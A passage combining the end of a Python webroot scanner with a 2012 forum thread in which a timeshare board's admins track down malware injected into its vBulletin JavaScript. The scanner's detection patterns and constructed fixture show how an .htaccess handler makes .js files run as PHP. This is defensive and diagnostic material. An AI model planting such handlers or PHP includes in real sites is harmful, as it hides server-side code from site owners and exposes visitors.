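                    findings.append((path, no, "php-tag-in-static-asset"))
                elif name == ".htaccess" and HTACCESS_RISK.search(raw.decode("latin-1")):
                    findings.append((path, no, "htaccess-php-directive"))
    return findings


# Constructed sample: the first warning from the post above, appended to a stub script.
SAMPLE_BODY = (
    "function fetch_object(id) { return document.getElementById(id); }\n"
    "<br />\n<b>Warning</b>: include(vbulletin_css/styles.css) "
    "[<a href='function.include'>function.include</a>]: failed to open stream: "
    "No such file or directory in "
    "<b>/home/tugbbsc/public_html/forums/clientscript/vbulletin_global.js</b> "
    "on line <b>1730</b><br />\n"
)


def demo():
    """Build a throwaway webroot (constructed) with one tampered asset and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "clientscript"))
        with open(os.path.join(root, "clientscript", "vbulletin_global.js"), "w") as fh:
            fh.write("var a = 1;\n<?php include('vbulletin_css/styles.css'); ?>\n")
        with open(os.path.join(root, "clientscript", "clean.js"), "w") as fh:
            fh.write("var b = 2;\n")
        with open(os.path.join(root, ".htaccess"), "w") as fh:
            fh.write("Options -Indexes\nAddHandler application/x-httpd-php .js\n")
        return [(os.path.relpath(p, root).replace(os.sep, "/"), n, why)
                for p, n, why in scan_webroot(root)]


if __name__ == "__main__":
    for hit in php_warnings_in_asset(SAMPLE_BODY):
        print(hit)
    for finding in sorted(demo()):
        print(finding)
```

A hit from either function only says where to look; a clean copy of the script that still produces the warning points at something outside the file, such as a handler or include configured elsewhere on the server.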



## Htoo0 (Sep 8, 2012)

Well, I can tell you it's now gone on mine!  Smilies still don't work but it certainly is nice not to get the warning in the middle of the page. Thanks. (Also, clicking Quick Links changes it to Open Buddy List and Search changes to Mark Forums Read.) All I've noticed so far.


----------



## MichaelColey (Sep 8, 2012)

The error appears to be gone for me now, too, but the Javascript errors (affecting some of the vB functionality) are still there, probably related to the broken include I mentioned above. For instance:





> Message: Syntax error
> Line: 1730
> Char: 1
> Code: 0
> URI: http://tugbbs.com/forums/clientscript/vbulletin_global.js?v=364


----------



## Makai Guy (Sep 8, 2012)

Michael - can you repeat your Fiddler check and see if the warning is now gone?


----------



## MichaelColey (Sep 8, 2012)

Makai Guy said:


> Michael - can you repeat your Fiddler check and see if the warning is now gone?


Yes, it's gone now.  Also, I don't see any JavaScript errors and the vB functionality (at least what I've tried that wasn't working before) appears to be fixed.

I think you got it!


----------



## piper_chuck (Sep 8, 2012)

The Kaspersky warning I've been receiving for a while is now gone.


----------



## SmithOp (Sep 8, 2012)

Makai Guy said:


> HA!  I just stumbled on the styles.css file via another means.  It is definitely an infusion of malware, similar to stuff we've found in the past, and I've disabled it.  This error message tells us whatever is trying to call it now can't find it.  Now to analyze your warning and see where it leads us ..



I think you are on the right track, they have buried something that adds some obfuscated code pointing to a trojan server.  I used a different tool and it tried to execute 2 different trojans but Malwarebytes blocked it.

I also see a lot of advice to change your passwords and check your htaccess file.


----------



## Makai Guy (Sep 8, 2012)

MichaelColey said:


> Yes, it's gone now. Also, I don't see any JavaScript errors and the vB functionality (at least what I've tried that wasn't working before) appears to be fixed.
> 
> I think you got it!



I hope you're right.  Let's hope it stays "got" this time.

 This stuff is sure becoming a pain in the wazoobie.


----------



## MichaelColey (Sep 8, 2012)

The include error appears to be back.


----------



## Makai Guy (Sep 8, 2012)

MichaelColey said:


> The include error appears to be back.


ARRGGHH!  That sux.   I've fixed it again, but who knows how long it will last?


----------



## Passepartout (Sep 8, 2012)

*Finally* it looks like you know what rock to look under. It's working fine now, even formatting. And on Firefox, to boot.  Oh, and Quick Links don't do their dance and disappear either! Woo-Hoo!

Thanks Doug- and to Michael for the tip.
    

Jim


----------



## T_R_Oglodyte (Sep 8, 2012)

FWIW - not getting the error message now with JS enabled (Firefox and Windows 7, both current).  Also the site microfunctionalities that were not working before are now operating.


----------



## PearlCity (Sep 9, 2012)

Seems to be gone but I think it was a virus because my other computer that didn't have a firewall (I know I know.. my husband re-did it a few months ago and forgot to install the firewall) had some problems right when this whole thing started.......


----------



## KauaiMark (Sep 9, 2012)

*Kaspersky's happy*



piper_chuck said:


> The Kaspersky warning I've been receiving for a while is now gone.



TUG seems trojan free using IE9 or Firefox again!!!

...Mark


----------



## Dori (Sep 9, 2012)

YaY! I am able to get my TUG fix this morning.   Sure did miss you guys over the past few days! Thanks for all your hard work in tracking down the problems.

Dori


----------



## Picker57 (Sep 9, 2012)

Dori said:


> YaY! I am able to get my TUG fix this morning.   Sure did miss you guys over the past few days! Thanks for all your hard work in tracking down the problems.
> 
> Dori



Ditto here;  What a great community ! Happy travels all. 

------------Zach


----------



## kjsgrammy (Sep 9, 2012)

Dori said:


> YaY! I am able to get my TUG fix this morning.   Sure did miss you guys over the past few days! Thanks for all your hard work in tracking down the problems.
> 
> Dori



Ditto!  Thanks to all for the fix  So glad to be able to get back into TUG!


----------



## Picker57 (Sep 9, 2012)

From the 'Don't count your chickens' file.....IT'S BACK (at least on my machine). It's the same "Exploit Phoenix....Type 769" etc. message.  I haven't switched to Chrome yet because it seemed to go away anyway....at times.  Inasmuch as I'm barely knowledgeable to turn the computer ON, I'm still wondering if there's any potential damage by just letting it go. "Annoying" I can handle, "Harmful" not so much.

Also wondering, are Mac users getting this also?  

------------Zach


----------



## Makai Guy (Sep 9, 2012)

Picker57 said:


> From the 'Don't count your chickens' file.....IT'S BACK (at least on my machine). It's the same "Exploit Phoenix....Type 769" etc. message.  I haven't switched to Chrome yet because it seemed to go away anyway....at times.  Inasmuch as I'm barely knowledgeable to turn the computer ON, I'm still wondering if there's any potential damage by just letting it go. "Annoying" I can handle, "Harmful" not so much.
> 
> Also wondering, are Mac users getting this also?
> 
> ------------Zach


Please try it again now.


----------



## ace2000 (Sep 9, 2012)

Makai Guy said:


> Please try it again now.


 
You've got a comment line that displays on the top of the page...

[comment line removed so as not to tip our hand to the bad guys]


----------



## SueDonJ (Sep 9, 2012)

ace2000 said:


> You've got a comment line that displays on the top of the page...
> 
> 
> [comment line removed so as not to tip our hand to the bad guys]



I'm seeing the same thing here.  If it matters, I didn't have any of the problems that others had.


----------



## Makai Guy (Sep 9, 2012)

ace2000 said:


> You've got a comment line that displays on the top of the page...
> 
> [comment line removed so as not to tip our hand to the bad guys]



Temporary while I'm messing around.  Will go away shortly.  Thanks for being alert and reporting it though -- next time might not be so benign.


----------



## Ken555 (Sep 9, 2012)

Picker57 said:


> Also wondering, are Mac users getting this also?
> 
> ------------Zach



I'm not on Mac or iPad.


----------



## DeniseM (Sep 9, 2012)

I'm not getting it on my MacBook Air.


----------



## Picker57 (Sep 9, 2012)

Makai Guy said:


> Please try it again now.



Doug - It was clean this time.  Thanks; stay tuned.   On another subject, I posted some comments & queries to your North Shore website.

      Mahalo nui loa,
                          -----------------Zach


----------



## Jaybee (Sep 9, 2012)

Ahh!  At last!  No more red flags from AVG!


----------



## Htoo0 (Sep 9, 2012)

Everything good here. Thanks so much!


----------



## pammex (Sep 15, 2012)

seems okay now...yeah!


----------



## MichaelColey (Sep 16, 2012)

So, was this a real virus then?


----------



## TUGBrian (Sep 16, 2012)

Something was certainly on the server that shouldn't have been...but given all the people that reported the warning...and the fact so many others had no effects...(although one person did report actually getting something on their pc)...I'd have to say "I really don't know"  lol


----------



## timeos2 (Sep 16, 2012)

MichaelColey said:


> So, was this a real virus then?



There apparently was some type of script that, while in itself wasn't a virus or malware, was redirecting (or attempting to) requests to some type of malware source.  As it evolved I am sure that it took two parts to actually work. One was logging on to the TUG BBS but the other was local. IF your computer was already compromised by an underlying script or setting change by a malware or virus - not removed by your anti-virus or malware/spyware protections - then you got the warning (the otherwise benign script/program wasn't active until triggered by the login script) as your protections hopefully protected you from an ill-intentioned  process running that would actually trigger an infection. If you weren't so lucky then it actually would install the payload & now you have a completely compromised computer doing who knows what. 

It appears some products (such as Trend Micro, Avast! or Bitdefender & others) blocked the process or had never let it install as standard procedure and, unless you visited your log, it wasn't presenting any outward signs of an issue. Others, Norton, AVG etc were raising the flag and then blocked it but may have left the trigger on your computer. Both results are OK but the second is more troubling to the user.  Only those with no anti-virus (or an out of date one) were really at risk. 

At least that appears to be what occurred. There have been other sites with similar issues in the past that weren't as quick to respond & correct it as TUG. Kudos to the administrators that managed to track it down & correct it. Everyone is safer with it out of the system.  As for those that got the warnings I'd run the best cleanup software you can to try to identify any remotely questionable files / scripts on your computer. Something may be in there and waiting for the chance to be activated. It can't hurt to run a complete check to be sure. One that is very effective, and free, is the Security Tango found here. Just be ready to let it run for a few hours if you start it.


----------



## Makai Guy (Sep 16, 2012)

timeos2 said:


> It can't hurt to run a complete check to be sure. One that is very effective, and free, is the Security Tango found here. Just be ready to let it run for a few hours if you start it.



Some other malware finders/fixers:
Malwarebytes' Anti-Malware
SuperAntispyware
AdAware
Spybot Search & Destroy

Trying more than one is always a good idea, as no single program finds everything.

If you know you are infected and these programs don't find it or can't clear it, post in one of these forums for specialized malware removal help:
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://bleepingcomputer.com/
http://www.spywareinfoforum.com/

_Thanks to Daifne, Moderator on Mozillazine forums, for this list._


----------

